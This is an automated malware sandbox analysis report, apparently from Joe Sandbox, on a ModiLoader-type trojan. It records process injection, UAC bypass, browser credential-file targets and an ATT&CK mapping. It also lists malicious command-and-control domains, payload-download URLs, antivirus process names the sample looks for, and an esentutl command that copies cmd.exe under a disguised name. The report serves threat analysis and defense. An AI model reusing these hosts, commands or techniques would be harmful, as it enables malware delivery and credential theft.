              Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 15_2_00443355 mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 15_2_077D1120 mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 15_2_07814072 mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\SndVol.exe; Code function: 8_2_2917FBCD GetProcessHeap
              Source: C:\Windows\SysWOW64\SndVol.exe; Code function: 8_2_29164BD8 SetUnhandledExceptionFilter
              Source: C:\Windows\SysWOW64\SndVol.exe; Code function: 8_2_29164A8A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
              Source: C:\Windows\SysWOW64\SndVol.exe; Code function: 8_2_2916503C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
              Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 15_2_0043503C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
              Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 15_2_00434A8A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
              Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 15_2_0043BB71 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
              Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 15_2_00434BD8 SetUnhandledExceptionFilter
              Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 15_2_078057A7 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
              Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 15_2_07805D59 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
              Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 15_2_0780C88E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
              Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 15_2_078058F5 SetUnhandledExceptionFilter

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\jlPBMMQbXC.exe | Memory allocated: C:\Windows\SysWOW64\SndVol.exe base: 4420000 protect: page execute and read and write
Source: C:\Users\Public\Libraries\Selebzih.PIF | Memory allocated: C:\Windows\SysWOW64\colorcpl.exe base: 77D0000 protect: page execute and read and write
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe | Thread created: C:\Windows\SysWOW64\SndVol.exe EIP: 4421644
Source: C:\Users\Public\Libraries\Selebzih.PIF | Thread created: C:\Windows\SysWOW64\colorcpl.exe EIP: 77D1644
Source: C:\Windows\SysWOW64\esentutl.exe | File created: C:\Users\Public\alpha.pif
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe | Memory written: C:\Windows\SysWOW64\SndVol.exe base: 4420000 value starts with: 4D5A
Source: C:\Users\Public\Libraries\Selebzih.PIF | Memory written: C:\Windows\SysWOW64\colorcpl.exe base: 77D0000 value starts with: 4D5A
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe | Memory written: C:\Windows\SysWOW64\SndVol.exe base: 4420000
Source: C:\Users\Public\Libraries\Selebzih.PIF | Memory written: C:\Windows\SysWOW64\colorcpl.exe base: 77D0000
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe 8_2_29142132
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe 15_2_00412132
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 8_2_29149662 mouse_event,8_2_29149662
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 8_2_044559D3 cpuid 8_2_044559D3
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe | Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,0_2_02C55ACC
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe | Code function: GetLocaleInfoA,0_2_02C5A7C4
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe | Code function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,0_2_02C55BD8
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe | Code function: GetLocaleInfoA,0_2_02C5A810
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: GetLocaleInfoA,8_2_2913F90C
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: GetLocaleInfoW,8_2_2917896D
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,8_2_29181D58
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: EnumSystemLocalesW,8_2_29181FD0
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,8_2_29182143
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: EnumSystemLocalesW,8_2_2918201B
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: EnumSystemLocalesW,8_2_291820B6
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: GetLocaleInfoW,8_2_29182393
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: GetLocaleInfoW,8_2_291825C3
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: EnumSystemLocalesW,8_2_29178484
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,8_2_291824BC
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,8_2_29182690
Source: C:\Users\Public\Libraries\Selebzih.PIF | Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,10_2_02AA5ACC
Source: C:\Users\Public\Libraries\Selebzih.PIF | Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,10_2_02AA5BD7
Source: C:\Users\Public\Libraries\Selebzih.PIF | Code function: GetLocaleInfoA,10_2_02AAA810
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: EnumSystemLocalesW,15_2_0045201B
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: EnumSystemLocalesW,15_2_004520B6
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,15_2_00452143
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: GetLocaleInfoW,15_2_00452393
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: EnumSystemLocalesW,15_2_00448484
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,15_2_004524BC
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: GetLocaleInfoW,15_2_004525C3
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,15_2_00452690
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: GetLocaleInfoW,15_2_0044896D
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: GetLocaleInfoA,15_2_0040F90C
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,15_2_00451D58
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: EnumSystemLocalesW,15_2_00451FD0
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: GetLocaleInfoW,15_2_0781968A
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: GetLocaleInfoA,15_2_077E0629
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,15_2_078233AD
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: GetLocaleInfoW,15_2_078232E0
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: EnumSystemLocalesW,15_2_078191A1
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,15_2_078231D9
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: GetLocaleInfoW,15_2_078230B0
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,15_2_07822E60
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: EnumSystemLocalesW,15_2_07822DD3
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: EnumSystemLocalesW,15_2_07822D38
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: EnumSystemLocalesW,15_2_07822CED
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,15_2_07822A75
Source: C:\Windows\SysWOW64\cmd.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe | Code function: 0_2_02C5920C GetLocalTime,0_2_02C5920C
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 8_2_2914B69E GetUserNameW,8_2_2914B69E
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: 8_2_291793E5 _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,8_2_291793E5
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe | Code function: 0_2_02C5B78C GetVersionExA,0_2_02C5B78C
Source: C:\Windows\SysWOW64\SndVol.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: jlPBMMQbXC.exe, 00000000.00000003.1534458535.000000007EB20000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1627250031.000000007F2B0000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000003.1534140532.000000007EBF0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: cmdagent.exe
Source: jlPBMMQbXC.exe, 00000000.00000003.1534458535.000000007EB20000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1627250031.000000007F2B0000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000003.1534140532.000000007EBF0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: quhlpsvc.exe
Source: jlPBMMQbXC.exe, 00000000.00000003.1534458535.000000007EB20000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1627250031.000000007F2B0000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000003.1534140532.000000007EBF0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: avgamsvr.exe
Source: jlPBMMQbXC.exe, 00000000.00000003.1534458535.000000007EB20000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1627250031.000000007F2B0000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000003.1534140532.000000007EBF0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: TMBMSRV.exe
Source: jlPBMMQbXC.exe, 00000000.00000003.1534458535.000000007EB20000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1627250031.000000007F2B0000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000003.1534140532.000000007EBF0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: Vsserv.exe
Source: jlPBMMQbXC.exe, 00000000.00000003.1534458535.000000007EB20000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1627250031.000000007F2B0000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000003.1534140532.000000007EBF0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: avgupsvc.exe
Source: jlPBMMQbXC.exe, 00000000.00000003.1534458535.000000007EB20000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1627250031.000000007F2B0000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000003.1534140532.000000007EBF0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: avgemc.exe
Source: jlPBMMQbXC.exe, 00000000.00000003.1534458535.000000007EB20000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1627250031.000000007F2B0000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000003.1534140532.000000007EBF0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Source: Yara match | File source: 15.2.colorcpl.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.SndVol.exe.442191d.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.colorcpl.exe.77d0000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.colorcpl.exe.77d191d.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.SndVol.exe.4420000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.SndVol.exe.29130000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.SndVol.exe.4420000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.colorcpl.exe.77d191d.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.SndVol.exe.442191d.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.colorcpl.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.SndVol.exe.29130000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.colorcpl.exe.77d0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000F.00000002.1792665550.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.3862154789.0000000004420000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.1794055073.00000000077D0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: SndVol.exe PID: 7672, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: colorcpl.exe PID: 8136, type: MEMORYSTR
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data 8_2_2913BA4D
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data 15_2_0040BA4D
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\ 8_2_2913BB6B
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: \key3.db 8_2_2913BB6B
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\ 15_2_0040BB6B
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: \key3.db 15_2_0040BB6B

Remote Access Functionality

Source: Yara match | File source: 15.2.colorcpl.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.SndVol.exe.442191d.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.colorcpl.exe.77d0000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.colorcpl.exe.77d191d.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.SndVol.exe.4420000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.SndVol.exe.29130000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.SndVol.exe.4420000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.colorcpl.exe.77d191d.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.SndVol.exe.442191d.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.colorcpl.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.SndVol.exe.29130000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.colorcpl.exe.77d0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000F.00000002.1792665550.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.3862154789.0000000004420000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.1794055073.00000000077D0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: SndVol.exe PID: 7672, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: colorcpl.exe PID: 8136, type: MEMORYSTR
Source: C:\Windows\SysWOW64\SndVol.exe | Code function: cmd.exe 8_2_2913569A
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: cmd.exe 15_2_0040569A
MITRE ATT&CK Matrix

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses; Network Security Appliances
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure; Domains
Initial Access: Valid Accounts (1); Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise; Compromise Software Dependencies and Development Tools
Execution: Native API (1); Command and Scripting Interpreter (1); Service Execution (2); Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell; AppleScript
Persistence: DLL Side-Loading (1); Valid Accounts (1); Windows Service (1); Registry Run Keys / Startup Folder (1); Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron; Launchd
Privilege Escalation: DLL Side-Loading (1); Bypass User Account Control (1); Valid Accounts (1); Access Token Manipulation (11); Windows Service (1); Process Injection (421); Registry Run Keys / Startup Folder (1); Scheduled Task/Job; At; Cron; Launchd
Defense Evasion: Disable or Modify Tools (1); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (2); Timestomp (1); DLL Side-Loading (1); Bypass User Account Control (1); Masquerading (311); Valid Accounts (1); Virtualization/Sandbox Evasion (2); Access Token Manipulation (11); Process Injection (421)
Credential Access: OS Credential Dumping (1); Input Capture (111); Credentials In Files (2); NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing; Input Capture
Discovery: System Time Discovery (2); Account Discovery (1); System Service Discovery (1); System Network Connections Discovery (1); File and Directory Discovery (2); System Information Discovery (45); Security Software Discovery (241); Virtualization/Sandbox Evasion (2); Process Discovery (2); Application Window Discovery (1); System Owner/User Discovery (1)
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot; Software Deployment Tools
Collection: Archive Collected Data (11); Input Capture (111); Clipboard Data (3); Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging; Remote Data Staging
Command and Control: Ingress Tool Transfer (12); Encrypted Channel (21); Non-Standard Port (1); Non-Application Layer Protocol (2); Application Layer Protocol (213); Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols; Mail Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol; Exfiltration Over Unencrypted Non-C2 Protocol
Impact: System Shutdown/Reboot (1); Defacement (1); Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement; Firmware Corruption
Behavior Graph (ID: 1562864, Sample: jlPBMMQbXC.exe, Startdate: 26/11/2024, Architecture: WINDOWS, Score: 100)

Start node: DNS/IP: honeypotresearchteam.duckdns.org; pentester0.accesscam.org; 8 other IPs or domains. Signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 14 other signatures; Uses dynamic DNS services. Started processes: jlPBMMQbXC.exe; Selebzih.PIF; Selebzih.PIF.

• jlPBMMQbXC.exe (started from the start node): DNS/IP: lightstone.ae 162.19.139.102, 443, 49745, 49746 CENTURYLINK-US-LEGACY-QWESTUS United States; dual-spo-0005.spo-msedge.net 13.107.136.10, 443, 49722, 49723 MICROSOFT-CORP-MSN-AS-BLOCKUS United States. Dropped: C:\Users\Public\Selebzih.url (MS); C:\Users\Public\Libraries\Selebzih (data). Signatures: Writes to foreign memory regions; Allocates memory in foreign processes; Creates a thread in another existing process (thread injection); Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent). Started: SndVol.exe; cmd.exe; esentutl.exe.
• Selebzih.PIF (first instance): Signatures: Injects a PE file into a foreign processes. Started: colorcpl.exe.
• Selebzih.PIF (second instance): Signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file. Started: SndVol.exe.
• SndVol.exe (started by jlPBMMQbXC.exe): DNS/IP: honeypotresearchteam.duckdns.org 103.186.117.159, 13939, 49763, 49813 AARNET-AS-APAustralianAcademicandResearchNetworkAARNe unknown. Signatures: Contains functionality to bypass UAC (CMSTPLUA); Contains functionality to change the wallpaper; Contains functionality to steal Chrome passwords or cookies; Contains functionality to register a low level keyboard hook.
• cmd.exe (started by jlPBMMQbXC.exe): Started: esentutl.exe; conhost.exe.
• esentutl.exe (started by jlPBMMQbXC.exe): Dropped: C:\Users\Public\Libraries\Selebzih.PIF (PE32). Started: conhost.exe.
• colorcpl.exe (started by Selebzih.PIF): Signatures: Contains functionality to steal Firefox passwords or cookies; Delayed program exit found.
• esentutl.exe (started by cmd.exe): Dropped: C:\Users\Public\alpha.pif (PE32). Signatures: Drops PE files to the user root directory; Drops PE files with a suspicious file extension; Drops or copies cmd.exe with a different name (likely to bypass HIPS).

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample
Source | Detection | Scanner | Label | Link
jlPBMMQbXC.exe | 63% | ReversingLabs | Win32.Trojan.ModiLoader | -
jlPBMMQbXC.exe | 100% | Avira | TR/AD.Nekark.mucip | -
jlPBMMQbXC.exe | 100% | Joe Sandbox ML | - | -

Dropped Files
Source | Detection | Scanner | Label | Link
C:\Users\Public\Libraries\Selebzih.PIF | 100% | Avira | TR/AD.Nekark.mucip | -
C:\Users\Public\Libraries\Selebzih.PIF | 100% | Joe Sandbox ML | - | -
C:\Users\Public\Libraries\Selebzih.PIF | 63% | ReversingLabs | Win32.Trojan.ModiLoader | -
C:\Users\Public\alpha.pif | 0% | ReversingLabs | - | -

Unpacked PE Files
No Antivirus matches

Domains
No Antivirus matches

URLs
Source | Detection | Scanner | Label | Link
https://lightstone.ae/image/233_Selebzihtihv | 0% | Avira URL Cloud | safe | -
https://lightstone.ae:443/image/233_SelebzihtihzOEROSitPOExnUGlYeGtYV2hLMGY0YTNpZXRqOUJNTWJTWXJiYXBJ | 0% | Avira URL Cloud | safe | -
http://hydros.8k.com | 0% | Avira URL Cloud | safe | -
https://alfanar01-my.sharepoint.com/:u:/g/personal/huzaifa_alfanargas_com/EbcBi98Fae9PrYH7LpmiSQMBlK | 0% | Avira URL Cloud | safe | -
https://alfanar01-my.sharepoint.com/personal/huzaifa_alfanargas_com/Documents/233_Selebzihtih?ga=1Z | 0% | Avira URL Cloud | safe | -
https://alfanar01-my.sharepoint.com/personal/huzaifa_alfanargas_com/Documents/233_Selebzihtih?ga=1 | 0% | Avira URL Cloud | safe | -
archived.zapto.org | 100% | Avira URL Cloud | malware | -
pentester0.accesscam.org | 0% | Avira URL Cloud | safe | -
https://alfanar01-my.sharepoint.com/ | 0% | Avira URL Cloud | safe | -
https://alfanar01-my.sharepoint.com/:u:/g/personal/huzaifa_alfanargas_com/EbcBi98Fae9PrYH7LpmiSQMBlKcC8bPaqfGiqmGYrLTf6w?e=8qbxqz&download=1 | 0% | Avira URL Cloud | safe | -
honeypotresearchteam.duckdns.org | 100% | Avira URL Cloud | malware | -
https://alfanar01-my.sharepoint.com:443/:u:/g/personal/huzaifa_alfanargas_com/EbcBi98Fae9PrYH7LpmiSQ | 0% | Avira URL Cloud | safe | -
https://lightstone.ae/ | 0% | Avira URL Cloud | safe | -
https://lightstone.ae/image/233_Selebzihtih | 0% | Avira URL Cloud | safe | -
Domains and IPs

Contacted Domains
Name | IP | Active | Malicious | Antivirus Detection | Reputation
dual-spo-0005.spo-msedge.net | 13.107.136.10 | true | false | - | high
lightstone.ae | 162.19.139.102 | true | true | - | unknown
pentester0.accesscam.org | 103.186.117.159 | true | true | - | unknown
honeypotresearchteam.duckdns.org | 103.186.117.159 | true | true | - | unknown
alfanar01-my.sharepoint.com | unknown | unknown | true | - | unknown
archived.zapto.org | unknown | unknown | true | - | unknown
Contacted URLs
Name | Malicious | Antivirus Detection | Reputation
https://alfanar01-my.sharepoint.com/personal/huzaifa_alfanargas_com/Documents/233_Selebzihtih?ga=1 | false | Avira URL Cloud: safe | unknown
pentester0.accesscam.org | true | Avira URL Cloud: safe | unknown
archived.zapto.org | true | Avira URL Cloud: malware | unknown
https://alfanar01-my.sharepoint.com/:u:/g/personal/huzaifa_alfanargas_com/EbcBi98Fae9PrYH7LpmiSQMBlKcC8bPaqfGiqmGYrLTf6w?e=8qbxqz&download=1 | true | Avira URL Cloud: safe | unknown
honeypotresearchteam.duckdns.org | true | Avira URL Cloud: malware | unknown
https://lightstone.ae/image/233_Selebzihtih | true | Avira URL Cloud: safe | unknown
URLs from Memory and Binaries
Name | Source | Malicious | Antivirus Detection | Reputation
http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0 | jlPBMMQbXC.exe, 00000000.00000003.1534458535.000000007EB20000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1627250031.000000007F2B0000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000003.1534140532.000000007EBF0000.00000004.00001000.00020000.00000000.sdmp | false | - | high
https://lightstone.ae/image/233_Selebzihtihv | jlPBMMQbXC.exe, 00000000.00000002.1575706420.000000000077E000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://sectigo.com/CPS0 | jlPBMMQbXC.exe, 00000000.00000003.1534458535.000000007EB20000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1627250031.000000007F2B0000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000003.1534140532.000000007EBF0000.00000004.00001000.00020000.00000000.sdmp | false | - | high
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0 | jlPBMMQbXC.exe, 00000000.00000003.1534458535.000000007EB20000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1627250031.000000007F2B0000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000003.1534140532.000000007EBF0000.00000004.00001000.00020000.00000000.sdmp | false | - | high
http://ocsp.sectigo.com0 | jlPBMMQbXC.exe, 00000000.00000003.1534458535.000000007EB20000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1627250031.000000007F2B0000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000003.1534140532.000000007EBF0000.00000004.00001000.00020000.00000000.sdmp | false | - | high
https://lightstone.ae:443/image/233_SelebzihtihzOEROSitPOExnUGlYeGtYV2hLMGY0YTNpZXRqOUJNTWJTWXJiYXBJ | jlPBMMQbXC.exe, 00000000.00000002.1575706420.0000000000802000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
